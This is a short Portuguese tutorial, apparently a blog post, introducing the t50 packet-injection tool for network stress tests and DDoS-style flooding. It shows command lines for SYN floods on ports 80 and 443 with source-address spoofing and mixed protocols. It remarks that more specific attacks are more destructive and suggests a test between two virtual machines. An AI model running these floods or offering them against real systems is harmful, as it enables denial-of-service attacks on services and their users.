Conheça o t50: Ferramenta

para stress test (Pentest

DDoS)!
O t50, uma ferramenta desenvolvida pelo brasileiro Nelson Brito, é na prática um
software capaz de realizar stress tests em redes ou servidores específicos utilizando
a técnica de injeção de pacotes mesclando até 15 protocolos diferentes (TCP, UDP,
ICMP, IGMPv2, IGMPv3, EGP, DCCP, RSVP, RIPv1, RIPv2, GRE, ESP, AH, EIGRP,
OSPF, etc…). Em outras palavras, qualquer sysadmin pode utilizar esta ferramenta
para realizar testes de penetração em servidores utilizando um mix de ataques do
tipoDDoS (Distributed Denial of Service) – Basicamente como ocorreu nos
episódios dos últimos dias em sites do governo federal, quando crackers utilizaram
técnicas do tipo. Obviamente que, como toda ferramenta do gênero, o t50 pode ser
utilizado tanto pelo “lado negro da força”, quanto para antever falhas críticas de
segurança nos serviços que rodam na sua rede.

Como usar

Vamos explorar um pouco o T50

./t50 192.168.1.10 --flood --turbo --dport (80 443) -S --protocol TCP

Neste o atacante flooda o IP, adiciona turbo, ataca as portas 80 e 443, usando apenas SYN no protocolo
TCP

./t50 192.168.1.12 --flood --turbo --dport (80) -S -s 10.10.0. --protocol TCP

Neste o atacando flooda o IP, adiciona turbo, ataca a porta 80 usando apenas SYN e mascara a origem
com o range 10.10.0.x no protocolo TCP

--protocol T50
Faz um random de todos os protocolos

--sport 80 --dport 443

Ataca através da porta de origem 80 no alvo 443

Quanto mais específico o ataque melhor, mais destrutivo.

Faça um teste, crie 2 maquinas virtuais e faça o ataque.
Monitore com o Htop ou iptraf e vc verá a diferença

Download http://sourceforge.net/projects/t50/